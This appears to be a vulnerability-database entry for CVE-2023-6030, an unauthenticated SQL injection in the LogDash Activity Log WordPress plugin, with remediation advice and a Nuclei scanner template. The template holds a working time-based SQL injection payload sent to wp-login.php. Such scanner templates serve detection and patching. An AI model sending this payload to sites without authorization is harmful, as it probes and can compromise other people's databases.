/Vulnerability Library

LogDash Activity Log <= 1.1.3 - SQL Injection

CVE-2023-6030
Verified

Description

The LogDash Activity Log plugin for WordPress is vulnerable to SQL Injection via the username parameter in all versions up to, and including, 1.1.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Severity

Critical

CVSS Score

9.8

Exploit Probability

0%

Published Date

February 24, 2026

Template Author

shivam kamboj

CVE-2023-6030.yaml
id: CVE-2023-6030

info:
  name: LogDash Activity Log <= 1.1.3 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The LogDash Activity Log plugin for WordPress is vulnerable to SQL Injection via the username parameter in all versions up to, and including, 1.1.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection to execute arbitrary SQL commands, potentially compromising the database.
  remediation: |
    Upgrade to version 1.1.4 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/logdash-activity-log/logdash-activity-log-113-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6030
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6030
    epss-score: 0.00403
    epss-percentile: 0.6106
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,logdash-activity-log

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/logdash-activity-log/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 1.1.3")'
          - 'contains(body, "LogDash Activity Log")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - 'Stable tag:\s*([0-9]+\.[0-9]+\.[0-9]+)'
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log=' OR (SELECT 1 FROM (SELECT(SLEEP(7)))YY) # a&pwd=test&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 490a00463044022078780f31143a2be61d551d108896520411568767b6ce393a5c1bfb9b7e180cca022016d335e06d59e63865639ce14f95826ee38eab546d37af1d37e96cfff5501d44:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2023-6030
CWE ID:
cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/logdash-activity-log/logdash-activity-log-113-unauthenticated-sql-injectionhttps://nvd.nist.gov/vuln/detail/CVE-2023-6030

Remediation Steps

Upgrade to version 1.1.4 or later.